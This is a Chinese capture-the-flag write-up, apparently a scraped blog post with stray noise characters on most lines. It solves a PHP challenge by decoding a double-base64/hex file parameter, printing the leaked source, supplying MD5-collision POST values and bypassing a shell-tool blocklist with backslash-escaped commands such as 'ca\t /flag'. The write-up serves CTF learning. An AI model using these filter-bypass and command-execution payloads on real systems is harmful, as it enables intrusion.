|
|
) I* E. ]9 Q! U3 \1 ]; m<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>1 Y& L* ~5 W1 o
<p> </p>
H; g* m+ h6 f6 g, M<p> </p>
% F, x2 W D" B<p> 题目打开如下,?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=,同时查看源代码</p>* C7 i: ^ {1 o6 Y
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>5 V( b0 h& x+ q4 `* Y% v/ Y
<p> </p>* p/ }3 Y: \ P4 ~
<p> </p>0 |! w: k- p/ A1 D
<p>这里有个MD5 is funny,说明这个题目大概率跟MD5有关</p>1 I# v) O! l8 x4 `
<p>然后我抓包了一下,消息头里面没有什么特殊的东西,于是我尝试从url入手</p>
$ r# S1 B; H0 s<p>首先把那个进行一次base64位解码</p>" z% D& K0 o: S; a) w9 |! a3 u
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>" N. F. F r3 ]' ?2 ?
<p> </p>! i; J& M2 u6 d) g3 n f
<p> </p>
+ Q. g# W7 r# m q7 c P- x<p> 解码一次以后还是很像base64编码,于是又解码一次</p>
s% x' d$ q$ y j<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>8 x2 O6 O) e" \( m- S
<p> </p>
" Z6 {$ A0 D# o" i& [* M<p> </p>
; R, v# q x0 Q# M- G( u" q<p> 然后用hex解码一下得到了</p> o$ _3 y0 x+ j0 }
<div class="cnblogs_Highlighter">
. i4 U M! y" W! k! ?1 d<pre class="brush:sql;gutter:true;">555.png/ F. U) y3 r1 f8 Q# U' W) s
</pre>
0 s+ r9 N- F; i# u</div>. C2 `: f# B r; Z1 r0 [% A' Q
<p> 用同样的方法把index.php进行加密</p>
) K* p% h5 U- U! [<div class="cnblogs_Highlighter">- e: V: T1 Z( j9 Y& _- `! o& I e
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
, R+ W* y3 ^2 J6 L1 p; [</pre>
c; v/ x$ A' R# _3 W3 }+ N- d</div>
. H! J% L; D2 F0 l! Q, S<p> 然后输入到地址栏</p>9 R" I2 z" w4 K0 i7 f, H
<p> 然后查看源代码,把源代码里面的那一串base64的编码解码</p>
1 V7 w8 q/ w# d$ [% m3 @% V* N<div class="cnblogs_code">. X. V" {. X( B5 j9 M
<pre><?<span style="color: rgba(0, 0, 0, 1)">php
8 l, t' [; N+ ^3 L* Q5 s</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);: E8 J5 H E! Y% t( t
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);/ ~. y" X4 a. U, F5 v7 ^
</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
; T: L4 L5 G; D9 g* T. V2 \</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">]))
2 a- h3 i! f( W, ` </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd='<span style="color: rgba(0, 0, 0, 1)">); k: \& Z; f% \; O/ D% ^
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));
7 c- `- y8 n# M" X& [. u3 z# J0 \' A2 v& H0 [( m
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);
6 w2 B, M8 q& w5 C: s! ^</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
: M/ N, Z& |( _ </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '<img src ="./ctf3.jpeg">'<span style="color: rgba(0, 0, 0, 1)">;7 Q6 h9 i- J; W, F$ }/ W; |
</span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi~ no flag"<span style="color: rgba(0, 0, 0, 1)">);
$ w7 V+ x4 t; V" D, x} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
" @: n) D$ u& q/ J/ ?" K0 `8 o9 a </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
) n( d( E' X7 B1 t5 o& \& q </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'></img>"<span style="color: rgba(0, 0, 0, 1)">;- q2 H. v# c8 O2 }
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;! @& i& Q( ]' r( k/ `
}5 U9 _6 a" h4 K o
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
! K/ ]" s; E7 Z- M" E1 g) @& Q</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;, b6 h# _0 L6 C) y1 X
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
5 c, _' ^7 I9 U2 H* K- `" ] </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);7 {+ }% s6 I9 i
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;$ |" \8 r p' E5 O* p. `. G, R! I
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {5 \9 S) R0 }7 p5 @$ E
</span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {) o9 n/ V2 y/ _3 J
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
0 L: o" D9 v6 X } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {: z! x% g6 g) D4 Q2 u% q
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);- s0 j V9 G! G0 B) X, M& r
}5 z( ]; `( s8 {) d6 e
}
+ v* S, W) X" R% J+ H2 R, h
7 Z! n6 l/ [; }* [" p1 T2 T! ]</span>?>
: j9 z+ ~4 A8 `. y% s0 ?, U6 l! S<html>
3 u0 _" s% N6 d' ~<style><span style="color: rgba(0, 0, 0, 1)">
5 w2 t/ v! g0 ]. ` body{
9 |8 Q( x, e$ Z6 d3 V7 S( A; E background</span>:url(./bj.png) no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
4 b( \$ g1 u, g. o. N# B" c: a. a background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
1 N% E' N5 X8 q7 q2 h background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
5 ]% y+ Q' `- i& P% a background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>- X' |' f# Y# R/ D/ F* f
<span style="color: rgba(0, 0, 0, 1)">}# s1 X. g: T' c- B0 U8 _
</span></style>
( Q8 P. |2 A1 |) O9 Y- k; w<body>3 w( M8 b; K K# x7 K& L: h' o# O
</body>, _7 {) X8 `/ O# P8 Y2 ]4 p
</html></pre>% Z* X4 X6 F/ u2 E6 o% }4 {
</div>1 u5 W. ?6 ~1 h) F& g" e
<p>结合前面的推断,关键代码就在</p>3 ]$ ~+ o. f+ Y7 F+ w- {0 E
<div class="cnblogs_code">0 f' O. S$ y2 d3 \
<pre> <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {) X1 K) ^6 Z& m
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;1 q3 a0 \) H- ^9 \9 M
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {+ L- B7 [& Y I+ A
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
/ ]7 g, R1 D" P9 i) n p/ A7 z l }</span></pre>
+ t8 f3 K; o/ g/ o% a. O1 ~</div>4 l$ G/ ~2 m8 T3 I' a! Q6 G7 m5 n% o
<p>这种MD5是md5强碰撞</p># E, `) D" G4 t2 m
<div class="cnblogs_Highlighter">7 |9 _7 I" l1 l8 g# V: j9 \
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
& r- J1 x3 T5 y</pre>
6 ` G# d' h8 t& u5 ^" x& s</div> V! P9 n6 E j7 C) G
<div class="cnblogs_Highlighter"># r! M; ]4 O' L0 T% y
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
# F7 Y( e9 `& C! n: g+ P( B8 M</pre>
+ E0 d8 e9 _! G</div>1 e8 E. }% `, y# T/ x3 h1 K1 d
<p> 只需要这样就可以把cmd里面的当成命令来处理。</p>
! P4 A+ u7 h, Q5 l$ h: `<p>于是采用payload:</p>! V" _* j: v: ?6 b7 c/ Q
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>9 v! L* M# R" p" _
<p> </p>& f( f% G. H$ r. s* [0 S2 E
<p> 因为'\'并没有被屏蔽所以可以这么绕过</p>
, L" U: ~6 X( S, u! Y<p>ls和l\s在命令执行的时候结果是一样的。</p>: i6 o( ]( P4 C
<p>然后发现根目录里面有/flag</p>
1 l4 S i+ z1 c5 r<p>于是payload:</p>( o k) `! ^% Y+ B* O+ _& O9 F
<div class="cnblogs_Highlighter">
6 k, J# a9 {8 ?+ p$ V<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
; x; i. v* y& v# n$ k+ W8 ~% j</pre>
; V$ H% V, o, u6 u</div>
5 J: _, L, E$ Z8 e4 f X" e8 R, s9 v<p> 对于这个题目,因为他没有屏蔽sort和dir</p>. v& N9 j5 O0 o; k5 d) g' `4 K/ ~0 \
<p>所以查看也可以用dir来代替ls,cat可以用sort来代替。</p>
- i6 r7 A; g9 w<p> </p>
# z. u- M6 M) A# L: }# N) S- L |
|
发表于 2022-2-12 14:35:42